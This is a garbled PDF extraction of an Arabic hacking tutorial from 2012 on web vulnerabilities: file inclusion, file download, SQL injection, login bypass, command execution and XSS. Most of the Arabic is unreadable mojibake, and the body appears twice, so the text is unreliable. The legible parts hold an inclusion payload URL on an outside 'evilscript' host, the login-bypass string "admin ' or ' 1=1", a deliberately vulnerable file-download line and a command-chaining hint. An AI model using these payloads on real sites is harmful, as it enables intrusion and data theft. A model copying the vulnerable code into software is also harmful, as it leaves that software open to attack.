5;‫ل ا?ب أر‬5' ?&‫را‬+P‫ا'&? وا‬H‫&? وا‬G$/7

:23‫ ا?و‬Dl‫ ا‬l 2/‫ا‬1
Madrido.Jocker@gmail.com
: -H5)‫ زرة ا‬I; ‫أو‬
: SKYPE l 6‫ا‬5‫أو ا‬
AdelَSBM
‫ي‬D‫ا‬5‫ و‬2 ‫ء‬D‫ ا‬5;‫أر‬
2011/10/23
Z‫^] \[ ا‬

كتاب عالم الثغرات

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

كتاب عالم الثغرات

Uploaded by

Copyright:

Available Formats

http://www.the-code.

‫ اات‬ 2012 ‫اآف و ال اات‬

Adel SBM َ: #$%&

$'‫ ا* ا')( ا‬+,

6‫ ال آ‬5;‫ا أر‬8, -$)./ ‫ح‬1‫ و‬23.1 -4‫ا‬5)‫ ا‬6)7‫ا ا‬8‫ه‬

.M/, DH 23‫ــ إ‬F‫ــ‬/‫ا‬

Indoushka – Over-X - Ayme NDz

‫‪ 2B 2v3T‬ه‪8‬ا ا?ب ‪%‬ح آ‪ >$P$‬اآف اة و ا‪..F‬‬

F;R3 2‫دوات ا‬T‫( ا‬1

http://www.the-code.tk/code.php?id=96 :v‫ه ه‬D.& APPSERVE ‫ أو‬WAMP 13, 6$)R& ¡,‫روا‬

:(D$7, #/1 ‫ء أو ادراج‬D‫ )ا‬Remote File Inclusion ‫ة‬V (2

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-2

:2‫د ا‬5?‫ي ا‬5R test.php #/1 v D ‫ض أن‬Pv --

http://127.0.0.1/test.php M33‫ ا‬P), ªRP& ‫ و‬#/)‫ ا‬-B, v)H ‫ إذا‬-

: >RP‫ ا‬2B ‫ء‬p‫ة أ‬D ‫د‬5;‫'« و‬v

:(WAMP ‫دم‬p 6)7‫ أ‬3‫ )أ‬%A‫ا ا‬8‫ ه‬61

Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2

‫¡ ال؟‬,‫ > را‬F3 2B ٪ 00 ‫م ؟ أو‬FP‫> ا‬1 -4‫ و‬. ‫ن )ذا‬5/N+ ‫ون‬$?‫ا‬

:‫ا ا)ل‬8‫ل ه‬p (1 FP? >,;‫ا‬-

: (‫م‬FP‫> ا‬1 -4‫ون و‬D,) 6‫ ا‬v$D‫ اذا ا‬--

http://the-code.tk/evilscript.txt.php ¯v‫ ا‬6)$ ‫ء‬D‫ن ا‬T .v (

:‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-2

.M,? (1 ‫ل‬1 ‫ان‬

:(index.php #/1) ‫د ا)ب‬5?‫( ا‬1 #G1 -

:2&‫ن آ‬5?$ ‫وال‬

.‫ح‬.v, 6‫ء ا‬D‫ ا‬$ 2,‫و‬

:-$H‫> ا‬$P$‫ – آ‬3-2

#/1 6$)R&/‫اءة‬H/#‫ )آ‬Local File Inclusion/Download ‫ة‬V (3

: ‫ت‬P/)‫اءة ا‬G,  )+& 2‫وال ا‬D‫ ا‬7,

file_get_contents : 61‫ آ‬#/1 ‫اةة‬H

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-3

:2‫د ا‬5?‫ي ا‬5R test.php #/1 v D ‫ض أن‬Pv --

:6?‫ا ا‬8F, ‫ن‬5?$ ‫ال‬

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-3

download.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];

//header( "Content-Description: File Transfer");

.‫ح‬.v, ‫ب‬5/)‫ ا‬#/)‫اءة ا‬H (1 (?)3 I'

:-$H‫> ا‬$P$‫ – آ‬3-3

:(‫ت‬3$l‫ ا‬D‫ا‬5H (G') SQL Injection ‫ة‬V (4

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-4

test.php #/1 (1 (1 #G1 --

: ‫ر‬p, ‫د اة‬5;‫ ( و‬#?‫> ا‬$P$‫ آ‬-

.‫ى‬p‫ أ‬$ ‫ة‬D F %A‫و ر> ا‬

:2/ )‫ن آ‬5? ‫> ال و‬$P$‫ آ‬I‫د ا‬573-

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-4

listing_view.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

.($1DA+)‫ول ا‬D.‫( ا‬1 ‫)> ا)ور‬/‫ وآ‬23‫ ا?و‬D l‫ ا‬I/ 6Rv‫و‬

:(‫ل‬5pD‫ ا‬6$.+& ‫وز‬.& ) SQL Injection Login Bypass --3-4

login.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1

:‫د ا)ب‬5?‫( ا‬1 #G1 -

: >$‫ت ا‬15/7)‫ ا‬-4‫د و‬.), ‫ل‬5pD‫'> ا‬5 ‫وز‬.& vv?)

admin ' or ' 1=1 : ‫م‬DA+)‫ا ا‬

: -$H‫> ا‬$P$‫ – آ‬4-4

: ‫ت‬3$l‫ة ا‬DG /p ‫ث‬DR& 2‫> وا‬A‫وف ا‬R‫ ا‬-v), H ‫أو‬-

:(1‫وا‬T‫ ا‬8$Pv&) Remote Command Execution ‫ة‬V (5

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-5

test.php #/1 (1 #G1 --

: 2&T‫ ال  آ‬67.3 ‫ أن‬vv?) ªv1‫و‬

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-5

dig.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1

:‫د ا)ب‬5?‫( ا‬1 #G1 -

: 2&‫ ا‬6?, ª;5$ 1T‫و ا‬

:6?‫ا ا‬8F, ‫د‬5‫ آ‬vB‫ د‬5 : >1‫> ه‬B4‫ا‬-

‫ اات‬ 2012 ‫اآف و ال اات‬

Adel SBM َ: #$%&

$'‫ ا* ا')( ا‬+,

6‫ ال آ‬5;‫ا أر‬8, -$)./ ‫ح‬1‫ و‬23.1 -4‫ا‬5)‫ ا‬6)7‫ا ا‬8‫ه‬

.M/, DH 23‫ــ إ‬F‫ــ‬/‫ا‬

‫‪ 2B 2v3T‬ه‪8‬ا ا?ب ‪%‬ح آ‪ >$P$‬اآف اة و ا‪..F‬‬

F;R3 2‫دوات ا‬T‫( ا‬1

http://www.the-code.tk/code.php?id=96 :v‫ه ه‬D.& APPSERVE ‫ أو‬WAMP 13, 6$)R& ¡,‫روا‬

:(D$7, #/1 ‫ء أو ادراج‬D‫ )ا‬Remote File Inclusion ‫ة‬V (2

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-2

:2‫د ا‬5?‫ي ا‬5R test.php #/1 vD ‫ض أن‬Pv --

http://127.0.0.1/test.php M33‫ ا‬P), ªRP& ‫ و‬#/)‫ ا‬-B, v)H ‫ إذا‬-

: >RP‫ ا‬2B ‫ء‬p‫ة أ‬D ‫د‬5;‫'« و‬v

:(WAMP ‫دم‬p 6)7‫ أ‬3‫ )أ‬%A‫ا ا‬8‫ ه‬61

‫¡ ال؟‬,‫> را‬F3 2B ٪ 00 ‫م ؟ أو‬FP‫> ا‬1 -4‫ و‬. ‫ن )ذا‬5/N+ ‫ون‬$?‫ا‬

:‫ا ا)ل‬8‫ل ه‬p (1 FP? >,;‫ا‬-

: (‫م‬FP‫> ا‬1 -4‫ون و‬D,) 6‫ ا‬v$D‫ اذا ا‬--

http://the-code.tk/evilscript.txt.php ¯v‫ ا‬6)$ ‫ء‬D‫ن ا‬T .v (

:‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-2

.M,? (1 ‫ل‬1 ‫ان‬

:(index.php #/1) ‫د ا)ب‬5?‫( ا‬1 #G1 -

:2&‫ن آ‬5?$ ‫وال‬

.‫ح‬.v, 6‫ء ا‬D‫ ا‬$ 2,‫و‬

:-$H‫> ا‬$P$‫ – آ‬3-2

#/1 6$)R&/‫اءة‬H/#‫ )آ‬Local File Inclusion/Download ‫ة‬V (3

: ‫ت‬P/)‫اءة ا‬G, )+& 2‫وال ا‬D‫ ا‬7,

file_get_contents : 61‫ آ‬#/1 ‫اةة‬H

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-3

:2‫د ا‬5?‫ي ا‬5R test.php #/1 vD ‫ض أن‬Pv --

:6?‫ا ا‬8F, ‫ن‬5?$ ‫ال‬

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-3

download.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

.‫ح‬.v, ‫ب‬5/)‫ ا‬#/)‫اءة ا‬H (1 (?)3 I'

:-$H‫> ا‬$P$‫ – آ‬3-3

:(‫ت‬3$l‫ ا‬D‫ا‬5H (G') SQL Injection ‫ة‬V (4

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-4

test.php #/1 (1 (1 #G1 --

: ‫ر‬p, ‫د اة‬5;‫ ( و‬#?‫> ا‬$P$‫ آ‬-

.‫ى‬p‫ أ‬$ ‫ة‬D F %A‫و ر> ا‬

:2/ )‫ن آ‬5?‫> ال و‬$P$‫ آ‬I‫د ا‬573-

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-4

listing_view.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1 ‫ان‬

.($1DA+)‫ول ا‬D.‫( ا‬1 ‫)> ا)ور‬/‫ وآ‬23‫ ا?و‬Dl‫ ا‬I/ 6Rv‫و‬

:(‫ل‬5pD‫ ا‬6$.+& ‫وز‬.& ) SQL Injection Login Bypass --3-4

login.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1

:‫د ا)ب‬5?‫( ا‬1 #G1 -

: >$‫ت ا‬15/7)‫ ا‬-4‫د و‬.), ‫ل‬5pD‫'> ا‬5 ‫وز‬.& vv?)

admin ' or ' 1=1 : ‫م‬DA+)‫ا ا‬

: -$H‫> ا‬$P$‫ – آ‬4-4

: ‫ت‬3$l‫ة ا‬DG /p ‫ث‬DR& 2‫> وا‬A‫وف ا‬R‫ ا‬-v), H ‫أو‬-

:(1‫وا‬T‫ ا‬8$Pv&) Remote Command Execution ‫ة‬V (5

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-5

test.php #/1 (1 #G1 --

: 2&T‫ ال آ‬67.3 ‫ أن‬vv?) ªv1‫و‬

: ‫د اة‬5‫م ( آ‬DG1 ‫ل‬1 -- 2-5

dig.php : I)+ ‫ ا)ب‬#/)‫ وا‬M,? (1 ‫ل‬1

:‫د ا)ب‬5?‫( ا‬1 #G1 -

: 2&‫ ا‬6?, ª;5$ 1T‫و ا‬

:6?‫ا ا‬8F, ‫د‬5‫ آ‬vB‫ د‬5 : >1‫> ه‬B4‫ا‬-

:6?‫ا ا‬8F, ‫ن‬5?$ ‫ ال‬:>,;‫ا‬

.D'‫ وا‬MH‫ و‬2B 1‫ة أوا‬D $l ‫م‬DA+ || J1‫ن ا‬T

:(JAVA SCRIPT ‫ أو‬HTML ‫اد‬5‫( أآ‬G') Cross-Site Scripting ‫ة‬V (6

: 2&T‫ ال آ‬67.3 ‫ أن‬vv?) ªv1‫و‬

:‫د اة‬5‫ ( آ‬2‫ل أ‬1 -- 1-6

test.php #/1 (1 (1 #G1 --

:‫د ا)ب‬5?‫( ا‬1 #G1 -

: -$H‫> ا‬$P$‫ – آ‬2-6

. ‫¯ دي‬v‫ آ‬HTML ‫م‬5‫ص و و‬53 >/17), ‫م‬5G& ‫وال‬D‫ ا‬8‫ه‬

:6?‫ا ا‬8F, ‫ن‬5?$ -H)‫د ا‬5?‫ ا‬2,‫و‬

:INC files ‫ة‬V + Download Backups ‫ة‬V (7

:$R, ($.1l)/ >;‫ذ‬+‫ء ا‬pT‫( ا‬1 )‫ه‬l‫ أ‬$A

:(‫ت‬3$l‫ة ا‬DG, ‫ت ا&ل‬15/71 ‫ي‬5R #/1 ‫اءة‬H) ¡$+, ‫ل‬1

: -$H‫> ا‬G – 2-7

:(>)R‫ ا‬-H‫ا‬51 (1) ‫ل اات‬5' >/1‫( أ‬8

Remote File Inclusion ‫ة‬V (1

Local File Disclosure/Download ‫ة‬V (2

SQL Injection ‫ة‬V (3

Remote Command Execution ‫ة‬V (4

Cross-Site Scripting ‫ة‬V (5

5;‫ل ا?ب أر‬5' ?&‫را‬+P‫ا'&? وا‬H‫&? وا‬G$/7